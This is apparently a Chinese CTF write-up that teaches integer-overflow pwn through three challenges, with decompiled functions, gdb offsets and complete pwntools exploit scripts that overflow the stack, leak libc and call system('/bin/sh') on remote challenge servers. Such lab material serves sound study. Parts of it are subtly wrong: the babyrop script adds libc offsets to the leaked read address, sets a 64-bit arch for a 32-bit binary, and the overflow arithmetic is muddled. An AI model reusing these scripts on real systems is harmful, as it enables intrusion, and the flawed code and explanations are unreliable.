我们前面学习了栈迁移等一系列知识,想起来还有整数溢出没有学习,这里记录一下学习过程,也分享给各位进行学习。
基础知识
CTFwiki是这么说的:
在 C 语言中,整数的基本数据类型分为短整型 (short),整型 (int),长整型 (long),这三个数据类型还分为有符号和无符号,每种数据类型都有各自的大小范围,(因为数据类型的大小范围是编译器决定的,所以之后所述都默认是 64 位下使用 gcc-5.4),如下所示:
| 类型 | 字节 | 范围 |
|---|---|---|
| short int | 2byte(word) | 0至32767(0-0x7fff) -32768至-1(0x8000~0xffff) |
| unsigned short int | 2byte(word) | 0至65535(0至0xffff) |
| int | 4byte(dword) | 0至2147483647(0~0x7fffffff) -2147483648至-1(0x80000000~0xffffffff) |
| unsigned int | 4byte(dword) | 0至4294967295(0~0xffffffff) |
| long int | 8byte(qword) | 正: 0~0x7fffffffffffffff 负: 0x8000000000000000~0xffffffffffffffff |
| unsigned long int | 8byte(qword) | 0~0xffffffffffffffff |
当程序中的数据超过其数据类型的范围,则会造成溢出,整数类型的溢出被称为整数溢出。
溢出类漏洞
计算机中有 4 种溢出情况,以 32 位整数为例。
① 无符号上溢:无符号数 0xffffffff 加 1 会变成 0。
② 无符号下溢:无符号数 0 减去 1 会变成 0xffffffff,即-1。
③ 有符号上溢:有符号正数 0x7fffffff 加 1 变成 0x80000000, 即从 2147483647 变成了-2147483648。
④ 有符号下溢:有符号负数 0x80000000 减去 1 变成 0x7fffffff,即从-2147483648 变成了 2147483647。
一个经典的整数溢出例子就是 c 语言的 abs 函数,int abs(int x),该函数返回 x 的绝对值。但当 abs()函数的参数是 0x80000000 即-2147483648 的时候,它本来应该返回2147483648,但正整数的范围是 0-2147483647,所以他返回的仍然是个负数,即本身-2147483648。
看起来不是很好理解吧,这里我比较通俗的画图进行解释(这里以unsigned short int为例)
1字节->8位
经过转化,可以看到是符合我们上面给出的范围的,如果我们输入一个十进制数为65536呢?
65536相当于在65535后面加上一个1,这样的话其实就溢出了,根据计算机的存储原理,这样的话就会变为0,然后就会变成
1 00000000 00000000这个情况,但是unsigned short int占用2字节,所以取00000000 00000000
所以我们是不是就是根据上面这个原理,将一些很大的数或者负数会和某一个数字相同,这其实也就是整数溢出的利用原理
我们也可以写一个程序,看一下是不是符合我们上面说的这个逻辑
#include <stdio.h> int main(){ unsigned short int var1 = 1,var2 = 65537; if (var1==var2) { printf("stackoverflow"); } return 0; }
可以看到经过测试确实是存在上述逻辑的,接下来结合题目进行讲解
实操
int_overflow
溢出类漏洞
checksec&file
32位程序,开启了堆栈不可执行
IDA静态分析
main()
int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp+Ch] [ebp-Ch] BYREF setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); puts("---------------------"); puts("~~ Welcome to CTF! ~~"); puts(" 1.Login "); puts(" 2.Exit "); puts("---------------------"); printf("Your choice:"); __isoc99_scanf("%d", &v4); if ( v4 == 1 ) { login(); } else { if ( v4 == 2 ) { puts("Bye~"); exit(0); } puts("Invalid Choice!"); } return 0; }
就是一个选择选项的逻辑,如果选1就跳转到login(),如果选2则退出
login()
int login() { char buf[512]; // [esp+0h] [ebp-228h] BYREF char s[40]; // [esp+200h] [ebp-28h] BYREF memset(s, 0, 0x20u); memset(buf, 0, sizeof(buf)); puts("Please input your username:"); read(0, s, 0x19u); printf("Hello %s\n", s); puts("Please input your passwd:"); read(0, buf, 0x199u); return check_passwd(buf); }
这里大体看一下是不存在漏洞的,再看一下check_passwd()
check_passwd()
char *__cdecl check_passwd(char *s) { char dest[11]; // [esp+4h] [ebp-14h] BYREF unsigned __int8 v3; // [esp+Fh] [ebp-9h] v3 = strlen(s); if ( v3 <= 3u || v3 > 8u ) { puts("Invalid Password"); return (char *)fflush(stdout); } else { puts("Success"); fflush(stdout); return strcpy(dest, s); } }
这里存在栈溢出的点,可以利用strcpy将s的值复制给dest,这就存在栈溢出了
可以看到定义了一个无符号变量v3,v3就是输入的变量s的长度
然后这里利用strlen()对变量s的长度进行了检测,其实这里也就是我们之后利用整数溢出的漏洞利用点
what_is_this()
int what_is_this() { return system("cat flag"); }
后门函数
其实这道题目的思路也就有了,就是利用整数溢出绕过检测,然后ret2text
gdb动调
在check_passwd下一个断点
b *0x080486A4之后输入username和passwd看一下栈结构找一下溢出字节
>>> 0xffffce80-0xffffce6c
20
20+4=24exp:
#coding=utf-8 import os import sys import time from pwn import * from ctypes import * context.log_level='debug' context.arch='i386' p=remote("61.147.171.105",59290) #p=process('./pwn') elf = ELF('./pwn') libc = ELF('/lib/i386-linux-gnu/libc.so.6') s = lambda data :p.send(data) ss = lambda data :p.send(str(data)) sa = lambda delim,data :p.sendafter(str(delim), str(data)) sl = lambda data :p.sendline(data) sls = lambda data :p.sendline(str(data)) sla = lambda delim,data :p.sendlineafter(str(delim), str(data)) r = lambda num :p.recv(num) ru = lambda delims, drop=True :p.recvuntil(delims, drop) itr = lambda :p.interactive() uu32 = lambda data :u32(data.ljust(4,b'\x00')) uu64 = lambda data :u64(data.ljust(8,b'\x00')) leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr)) l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00")) context.terminal = ['gnome-terminal','-x','sh','-c'] def dbg(): gdb.attach(p,'b *$rebase(0x13aa)') pause() backdoor=0x0804868B ru('Your choice:') s('1') r s('evil') payload = b'a'*0x14 +b'a'*4 + p32(backdoor) payload = payload.ljust(260,b'a') ru('Please input your passwd:') s(payload) p.interactive()
解释一下exp中最关键的一步
首先这里是先进行了一个栈溢出,覆盖了父函数的ebp,然后将ret_addr设定为后门函数,之后为什么我们要填充payload长度为260呢
这里v3的类型是unsigned __int8,是无符号型,而且是int8的,一共8位,这里算一下十进制
最大是255,所以我们这里的整数溢出是
3+255->258,如果我们长度超过了258即可溢出,如果是258的话其实就是0我们passwd的范围是3<=passwd<8,所以这里我选用了260
pwn2_sctf_2016
符号转换类漏洞
file&checksec
IDA分析
main()
int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(stdout, 0, 2, 0); return vuln(); }
调用了vuln()函数
vuln()
int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to read? "); get_n(nptr, 4); v2 = atoi(nptr); if ( v2 > 32 ) return printf("No! That size (%d) is too large!\n", v2); printf("Ok, sounds good. Give me %u bytes of data!\n", v2); get_n(nptr, v2); return printf("You said: %s\n", nptr); }
这里存在栈溢出漏洞,我们定义的nptr()变量距离ebp距离为0x2c,如果我们绕过长度限制,是不是就可以读入超过0x2c距离的字节呢,因此就产生栈溢出
get_n()
int __cdecl get_n(int a1, unsigned int a2) { unsigned int v2; // eax int result; // eax char v4; // [esp+Bh] [ebp-Dh] unsigned int i; // [esp+Ch] [ebp-Ch] for ( i = 0; ; ++i ) { v4 = getchar(); if ( !v4 || v4 == 10 || i >= a2 ) break; v2 = i; *(_BYTE *)(v2 + a1) = v4; } result = a1 + i; *(_BYTE *)(a1 + i) = 0; return result; }
这里通俗一点讲,其实就是第一个参数是指针,第二个参数是输入的长度,这里有一个整数溢出漏洞点,我们这里的第二个参数的类型是
unsigned int,但是回到我们的vuln(),这里定义的第二个参数其实是int类型的,属于强制类型转换,因此产生整数溢出漏洞
gdb动调
看一下溢出字节
0xffffcbd8-0xffffcbac=44
44+4=48所以我们思路也就有了:
- 对于绕过长度限制,我们可以利用-1,因为对于这种进行强制类型转换的,前面也说了在get_n()中第二个参数的类型是unsigned int,但vuln()调用get_n()函数的时候第二个参数的类型是int,所以我们int里的-1->0xffffffff,对于unsigned int->4294967295,从而绕过长度限制
- 之后利用printf泄露libc基地址,ret2libc打法
exp:
#coding=utf-8 import os import sys import time from pwn import * from ctypes import * context.log_level='debug' context.arch='i386' p=remote("node4.buuoj.cn",25883) #p=process('./pwn') elf = ELF('./pwn') libc = ELF('Ubantu16 32bit.so') s = lambda data :p.send(data) ss = lambda data :p.send(str(data)) sa = lambda delim,data :p.sendafter(str(delim), str(data)) sl = lambda data :p.sendline(data) sls = lambda data :p.sendline(str(data)) sla = lambda delim,data :p.sendlineafter(str(delim), str(data)) r = lambda num :p.recv(num) ru = lambda delims, drop=True :p.recvuntil(delims, drop) itr = lambda :p.interactive() uu32 = lambda data :u32(data.ljust(4,b'\x00')) uu64 = lambda data :u64(data.ljust(8,b'\x00')) leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr)) l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00")) context.terminal = ['gnome-terminal','-x','sh','-c'] def dbg(): gdb.attach(p,'b *$rebase(0x13aa)') pause() ret=0x08048346 printf_plt=0x08048370 printf_got=elf.got['printf'] leak('printf_got',printf_got) main=elf.symbols['main'] ru('How many bytes do you want me to read? ') sls(-1) ru('bytes of data!\n') pl='a'*48+p32(printf_plt)+p32(main)+p32(printf_got) sl(pl) ru('\n') printf=uu32(r(4)) leak('printf',printf) libcbase=printf-libc.symbols['printf'] leak('libcbase',libcbase) system=libcbase+libc.symbols['system'] leak('system',system) binsh=libcbase+next(libc.search('/bin/sh\00')) leak('binsh',binsh) ru('How many bytes do you want me to read? ') sls(-1) pl2='a'*48+p32(system)+p32(main)+p32(binsh) ru('bytes of data!\n') sl(pl2) p.interactive()
[OGeek2019]babyrop
strncmp绕过+整数溢出
file&checksec
IDA静态分析
这道题目去除了符号表
main()
int __cdecl main() { int buf; // [esp+4h] [ebp-14h] BYREF char v2; // [esp+Bh] [ebp-Dh] int fd; // [esp+Ch] [ebp-Ch] sub_80486BB(); fd = open("/dev/urandom", 0); if ( fd > 0 ) read(fd, &buf, 4u); v2 = sub_804871F(buf); sub_80487D0(v2); return 0; }
调用了sub_80486BB(),然后fd是open的返回值
如果操作成功,它将返回一个文件描述符,如果操作失败,它将返回-1;之后就是一个read(),就是将fd所指向的随机数写入到buf,长度4个字节
之后再v2赋值,再对v2进行判断
sub_80486BB()
int sub_80486BB() { alarm(0x3Cu); signal(14, (__sighandler_t)handler); setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); return setvbuf(stderr, 0, 2, 0); }
sub_804871F()
int __cdecl sub_804871F(int a1) { size_t v1; // eax char s[32]; // [esp+Ch] [ebp-4Ch] BYREF char buf[32]; // [esp+2Ch] [ebp-2Ch] BYREF ssize_t v5; // [esp+4Ch] [ebp-Ch] memset(s, 0, sizeof(s)); memset(buf, 0, sizeof(buf)); sprintf(s, "%ld", a1); v5 = read(0, buf, 0x20u); buf[v5 - 1] = 0; v1 = strlen(buf); if ( strncmp(buf, s, v1) ) exit(0); write(1, "Correct\n", 8u); return (unsigned __int8)buf[7]; }
这里是先将随机数通过sprintf()函数写入数组s中,之后v5 read()读取buf 0x20的大小,之后再比较buf与s的前v1个字符,如果成功则打印字符,不相同则退出程序,然后返回buf[7]的值,所以我们需要构造buf[7]
sub_80487D0()
ssize_t __cdecl sub_80487D0(char a1) { char buf[231]; // [esp+11h] [ebp-E7h] BYREF if ( a1 == 127 ) return read(0, buf, 0xC8u); else return read(0, buf, a1); }
就是一个判断,如果a1的值等于127,则想buf中写入0xc8的大小,否则写入a1大小的值,这里也是存在栈溢出的点
思路:
- 首先绕过strncmp()函数
- 构造合适大小的a1值
- ret2libc
绕过strncmp()
我们经过前面的分析,buf是生成的随机数,s是一个数组,是不可能完全相等的,但是我们可以利用00截断,将buf的长度设置为0,这样的话其实就可以绕过了
strcmp的特性是遇到’\0’就停止比较字符串,这里可以考虑00截断绕过。构造合适大小的a1值
这个就需要利用ASCII码转义'\x'了,因为a1被定义为char类型,所以需要利用ascii码转义
'\xhh'->两位十六进制
'\xff'->255所以可以进行构造一个能够溢出的长度
exp:
#coding=utf-8 import os import sys import time from pwn import * from ctypes import * context.log_level='debug' context.arch='amd64' p=remote("node4.buuoj.cn",28775) #p=process('./pwn') elf = ELF('./pwn') libc = ELF('./libc.so') s = lambda data :p.send(data) ss = lambda data :p.send(str(data)) sa = lambda delim,data :p.sendafter(str(delim), str(data)) sl = lambda data :p.sendline(data) sls = lambda data :p.sendline(str(data)) sla = lambda delim,data :p.sendlineafter(str(delim), str(data)) r = lambda num :p.recv(num) ru = lambda delims, drop=True :p.recvuntil(delims, drop) itr = lambda :p.interactive() uu32 = lambda data :u32(data.ljust(4,b'\x00')) uu64 = lambda data :u64(data.ljust(8,b'\x00')) leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr)) l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00")) context.terminal = ['gnome-terminal','-x','sh','-c'] def dbg(): gdb.attach(p,'b *$rebase(0x13aa)') pause() write_plt=elf.symbols['write'] leak('write_plt',write_plt) read_got=elf.got['read'] leak('read_got',read_got) main=0x08048825 pl='\00'+'\xff'*7 s(pl) ru('Correct\n') pl2=cyclic(235)+p32(write_plt)+p32(main)+p32(1)+p32(read_got)+p32(4) s(pl2) read=uu32(r(4)) leak('read',read) system=read+libc.symbols['read'] leak('system',system) binsh=read+next(libc.search('/bin/sh\00')) leak('binsh',binsh) s(pl) ru('Correct\n') pl3=cyclic(235)+p32(system)+'a'*4+p32(binsh) s(pl3) p.interactive()
- 第一个框,绕过strncmp()函数
- 第二个框,进行构造ret2libc打法
- 第三个框getshell
如有侵权请联系:admin#unsafe.sh